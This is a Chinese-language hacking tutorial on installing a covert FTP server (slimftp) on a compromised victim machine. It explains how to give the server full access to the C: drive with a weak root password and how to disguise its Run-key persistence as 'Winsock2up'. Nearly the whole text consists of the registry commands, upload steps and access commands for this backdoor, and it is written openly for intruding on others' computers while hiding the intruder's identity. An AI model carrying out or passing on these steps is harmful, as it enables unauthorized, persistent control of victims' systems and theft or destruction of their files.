我們在入侵別人機器時候，經常需要一個ftp服務器。去申請的主頁空間附帶的ftp服務器常常有各種限制，而且，不小心就會暴露了自己的身份。因此，建立一個自己專用的ftp服務器，是很有用的。經過我一陣瘋狂搜索，終于找到了slimftp這個好東東，首先，它身材小巧，而且不需要安裝，在console下就可以運行，絕對不會彈出窗口，提供了標準的上傳、下載功能，而且可以更改服務端口、設置用戶權限等。關于slimftp的功能，請參考它的說明文檔。
在這里，我假定大家已經獲得了一個管理員或者系統權限的shell，這是安裝它必需的權限。

安裝步驟：安裝步驟分為本地設置和服務器設置。

本地設置：將本文附帶的文件全部放在一個文件夾里面，這里是d:\ftp，然后運行adminftp.exe。運行窗口分成三部分，最上面是服務器的參數的設置，左下方是用戶帳號的設置，右下方是訪問目錄的設置。

對于服務器參數的設置，只需要對server port（服務器端口）進行一下設置就可以了，因為服務器上通常還運行有ftp服務器，所以，我們改一個不一樣的端口，這里我是設置了3323,另外兩個參數就不用管了。然后，我們再添加一個用戶，點一下new，輸入一個用戶名root，再選中這個用戶，輸入一個密碼nopass 。最后，在localroot上輸入一個路徑c:\，這是作為root用戶的根目錄的，點一下new，在彈出的窗口上輸入 / 就可以了，再將下面的四個權限全部鉤上吧。read權限允許用戶下載文件，write權限允許用戶上傳文件，list權限允許用戶看目錄列表，admin權限允許用戶重命令和刪除ftp服務器上的文件。如果需要，還可以創建多個用戶，這就要看你了。

進入命令行，切換目錄到d:\ftp，輸入

reg export "HKLM\SOFTWARE\WhitSoft Development" ftp.reg

現在本地操作已經全部完成了。

遠程操作：將ftp.reg、slimftp2.exe、reg.exe都上傳到肉雞上，然后將slimftp2.exe拷貝到肉雞的系統目錄（通常為c:\winnt\****32，假如不存在）上。再運行

reg import ftp.reg

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe

copy slimftp2.exe %****root%\****32

slimftp2.exe

運行copy slimftp2.exe %****root%\****32這步的時候有時會提示出錯，這是因為slimftp2.exe已經是在系統目錄上了。最后，刪除ftp.reg吧！。

呵呵，一切都完成了，即使肉雞重啟我們的ftp服務器也會照樣運行的。

不過，這個服務器的端口有點特別，我們怎么訪問呢？

假如是用ie，這樣輸入就好了 ftp://root:nopass@192.168.0.1:3323/ 將192.168.0.1替換成你服務器的ip就可以了。dos下的ftp呢？這樣！

ftp

open 192.168.0.1 3323

root

nopass

　

注意事項：你可以將slimftp2.exe的文件名、服務端口更改，但是，相應的步驟輸入也應該更改。

比如，我將slimftp2.exe改名叫wsockup.exe，那么，

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe

就應該變為

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d wsockup.exe